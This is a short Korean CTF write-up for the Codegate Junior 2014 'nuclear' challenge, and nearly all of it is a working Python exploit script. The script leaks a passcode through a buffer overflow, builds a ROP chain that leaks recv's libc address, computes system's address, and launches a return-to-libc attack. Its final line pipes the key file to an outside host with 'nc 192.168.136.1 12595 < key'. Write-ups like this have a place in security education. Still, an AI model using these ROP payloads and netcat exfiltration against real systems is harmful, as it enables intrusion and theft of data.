Codegate Junior 2014 Prequal - nuclear

서버 환경을 몰라서 Ubuntu 14.04 64bit에 Full ASLR 환경으로 설정 후 풀었습니다.

원래 처음엔 mprotect 함수를 이용하여 쉘을 따려고 했으나 잘 되지 않아서 그냥 키 값만 읽어오도록 했습니다.

from hackutil import *
from time import *
from socket import *
 
# ==========================================
leak = 'A'*0x200
recv_plt = 0x080488E0
recv_got = 0x0804B074
send_plt = 0x08048900
ppppr = 0x0804917c
vuln_func = 0x08048B5B
data_ = 0x0804b090
offset_system_recv = 0x1010
# ==========================================
 
banner()
 
print "==================[ Phase 1 : Passcode leak ]=================="
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.136.137', 1129))
s.recv(1024)
s.send('target\n')
sleep(0.1)
s.recv(1024)
s.send('1234.12341234/1234.12341234\n')
sleep(0.1)
s.recv(1024)
s.send(leak+'\n')
sleep(0.1)
data = s.recv(1024)
passcode = data[len(leak)+30:len(leak)+30+0x04]
print "[*] passcode : "+passcode
s.close()
 
print "================[ Phase 2 : Find Library Func ]================"
 
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect(('192.168.136.137', 1129))
s2.recv(1024)
s2.send('launch\n')
sleep(0.1)
s2.recv(1024)
 
payload2 = 'A'*(0x20C+4)
payload2 += p32(send_plt) + p32(ppppr) + p32(4) + p32(recv_got) + p32(4) + p32(0)
payload2 += p32(vuln_func) + p32(0) + p32(4)
 
s2.send(passcode+"\n")
sleep(0.1)
s2.recv(1024)
s2.send(payload2)
sleep(0.1)
recv_lib = up32(s2.recv(1024)[0:4])[0]
system_lib = recv_lib + offset_system_recv
 
print "[*] Found recv_lib : "+hex(recv_lib)
print "[*] Found system_lib : "+hex(system_lib)
 
 
print "=================[ Phase 3 : Attack with RTL ]================="
 
payload3 = 'A'*(0x20c+4)
payload3 += p32(recv_plt) + p32(ppppr) + p32(4) + p32(data_) + p32(0xff) + p32(0)
payload3 += p32(system_lib) + "AAAA" + p32(data_)
 
s2.send(payload3)
sleep(0.1)
s2.send('nc 192.168.136.1 12595 < key')
s2.close()
print "========================[ Got the Key ]========================"